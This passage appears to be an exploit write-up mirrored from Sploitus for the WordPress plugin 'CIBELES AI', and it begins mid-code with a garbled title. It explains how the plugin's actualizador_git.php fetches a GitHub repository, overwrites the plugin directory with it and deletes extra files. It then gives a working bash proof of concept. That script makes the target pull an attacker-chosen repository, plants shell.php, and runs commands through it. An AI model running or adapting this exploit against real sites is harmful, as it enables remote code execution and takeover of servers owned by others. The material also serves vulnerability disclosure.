Share
## https://sploitus.com/exploit?id=7CA9790F-8462-520B-B436-55570EA7C3C6
# CIBELES AI extractTo($extractDir);
   $rootInsideZip = $extractDir . DIRECTORY_SEPARATOR . $entries[0];
   rrcopy_into($rootInsideZip, $cwd);
   ```
   The [`rrcopy_into()`](https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L72) function recursively copies all files from the extracted repository to the current working directory (plugin directory), overwriting existing files.

5. **File Deletion ([Line 152-154](https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L152)):**
   Files not present in the downloaded repository are deleted:
   ```php
   mirror_delete_extras($cwd, $keepSet, $PRESERVE);
   ```
   The [`mirror_delete_extras()`](https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L111) function deletes any files in the plugin directory that don't exist in the repository manifest.


### Proof of Concept

```bash
TARGET="http://example.com"
OWNER="your_username"
REPO="minimal-rce"
TOKEN="github_pat_blablabla"

COMMAND="whoami"

echo "[*] Exploiting actualizador_git.php vulnerability..."
echo "[*] Downloading and installing shell from GitHub repository: ${OWNER}/${REPO}"

curl -s "${TARGET}/wp-content/plugins/cibeles-ai/actualizador_git.php?owner=${OWNER}&repo=${REPO}&ref=main&token=${TOKEN}"

echo ""
echo "[*] Exploit executed. Checking if shell.php was created..."
echo ""

echo "[*] Testing shell access..."
curl -s "${TARGET}/wp-content/plugins/cibeles-ai/shell.php?cmd=${COMMAND}"

echo ""
echo ""
echo "[*] Shell should be accessible at:"
echo "    ${TARGET}/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND"
```